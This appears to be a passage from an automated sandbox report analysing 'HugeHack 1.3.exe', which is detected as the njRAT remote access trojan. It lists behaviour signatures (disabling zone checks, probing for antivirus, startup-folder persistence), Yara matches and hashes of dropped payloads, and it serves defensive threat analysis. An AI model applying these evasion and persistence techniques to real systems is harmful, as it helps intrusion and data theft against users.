Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables zone checking for all users

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS

AV process strings found (often used to terminate AV products)

Binary or memory string: Wireshark.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Roaming\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Njrat

Source: Yara match	File source: HugeHack 1.3.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3698298941.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HugeHack 1.3.exe.bin.exe PID: 7552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Payload.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match	File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED

Remote Access Functionality

Yara detected Njrat

Source: Yara match	File source: HugeHack 1.3.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3698298941.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HugeHack 1.3.exe.bin.exe PID: 7552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Payload.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match	File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED

Windows Analysis Report
HugeHack 1.3.exe.bin.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Change of critical system settings

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1645836
Product:	CloudBasic
Start time:	17:33:23
Start date:	22.03.2025
Sample:	HugeHack 1.3.exe.bin.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	a6d81f76e32d232302d5d3e088cbeb16
SHA1:	345f29473e735735a4ad9e63e668f7eb89ce843c
SHA256:	107c0d57d568c7f5e3cce08d6915098a12b1703c75e454ae4600c976dadd8aa8
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\ClickMe.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	C03A9146CD4539F6E24EE4131AA411DE	B344317AFF90DE6CE99DD2F76111907870EEFEF8	D71797F270A04477730E62C0239E2C5743B43DD282F04E0E6F313AC0A3F2D7A0
C:\ProgramData\Oracle\Java\.oracle_jre_usage\b5820291038aa69c.timestamp	ASCII text, with CRLF line terminators	8D559EE1B00DFF6CBC7D73BB4A02AC65	3B01FAF348512FC7F773D98395223567BFB75045	780FECDCF87B12D200874CD77AC0EDD48883D16C7C7C6845F1616F237672D6F8
C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\Payload.exe.log	ASCII text, with CRLF line terminators	260E01CC001F9C4643CA7A62F395D747	492AD0ACE3A9C8736909866EEA168962D418BE5A	4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dllhost.exe.log	ASCII text, with CRLF line terminators	260E01CC001F9C4643CA7A62F395D747	492AD0ACE3A9C8736909866EEA168962D418BE5A	4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	A8D66A40EEA8831B03CDC478ED797E6E	F2DB655B7A8F6A211E8F6D95B50B3D7BC325F7CE	09178396408F3B27CBE725A8A455B37894EE4A3DBFCC34636DD23E96AB97C8CA
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	B1A57DF285AC44519C05A79B7978BFFE	823D87A509557FACF7BB94287F908711E58B693C	1B14D1E511A6B6E8285CD28C8216852BF81148D41B3CCF2F7905FEF239968FF6
C:\Users\user\AppData\Local\Temp\HugeHack.jar	Java archive data (JAR)	7D6B8CBC4989A4544BC16A54CC1B1379	1CBCE496A19E1C94A614C901503A3C1583326417	BA4DA4D1709BAF80E3EB33BFB2DB82374B19F4A198EA663B4289D197585F0524
C:\Users\user\AppData\Local\Temp\Payload.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	C03A9146CD4539F6E24EE4131AA411DE	B344317AFF90DE6CE99DD2F76111907870EEFEF8	D71797F270A04477730E62C0239E2C5743B43DD282F04E0E6F313AC0A3F2D7A0
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ah5ig3ls.mok.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blo5iipr.525.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c4xad4ug.pur.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5gvr0te.rmk.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kjl3ywhq.z14.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbughhii.zyp.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pum5txze.yfr.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r2j0r04h.yzt.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spmkpcr2.cva.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u4tzlfi3.hph.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\ere.js	ASCII text, with very long lines (575), with CRLF line terminators	80AD90C98E9EF8EAFFF93E660CD1F5CB	C1E03F1DF01AC5388F2C68D9001F00A4A65F60F1	55D1218D2454BCDB252EB1AFC5C6FAC56F93A4221CFBA61346E6338A0C3D106C
C:\Users\user\AppData\Local\Temp\hsperfdata_user\7728	data	0B927DE0A23FF07CEAA4306BF6226052	20A9E590D1F3889E1053E3E12560B3115C064CF0	F8F02622FB3DD17C48D681B98C18A1D9ABA4FDACA92D65317CC6879D892991E7
C:\Users\user\AppData\Local\Temp\webhook.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	4CE347196EE1D687888195DC13F9859C	2784B1C3C06203B31915DA958554340991223E9D	780BF370F55BED41C91E40A07DB66BF12059F38E8AD1B9481DA1748BEA29FF48
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\83aa4cc77f591dfc2374580bbd95f6ba_9e146be9-c76a-4720-bcdb-53011b87bd06	data	C8366AE350E7019AEFC9D1E6E6A498C6	5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61	11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	C03A9146CD4539F6E24EE4131AA411DE	B344317AFF90DE6CE99DD2F76111907870EEFEF8	D71797F270A04477730E62C0239E2C5743B43DD282F04E0E6F313AC0A3F2D7A0
C:\Users\user\AppData\Roaming\dllhost.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	C03A9146CD4539F6E24EE4131AA411DE	B344317AFF90DE6CE99DD2F76111907870EEFEF8	D71797F270A04477730E62C0239E2C5743B43DD282F04E0E6F313AC0A3F2D7A0

Windows Analysis Report HugeHack 1.3.exe.bin.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Change of critical system settings

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
HugeHack 1.3.exe.bin.exe

Malware Threat Intel
Provided by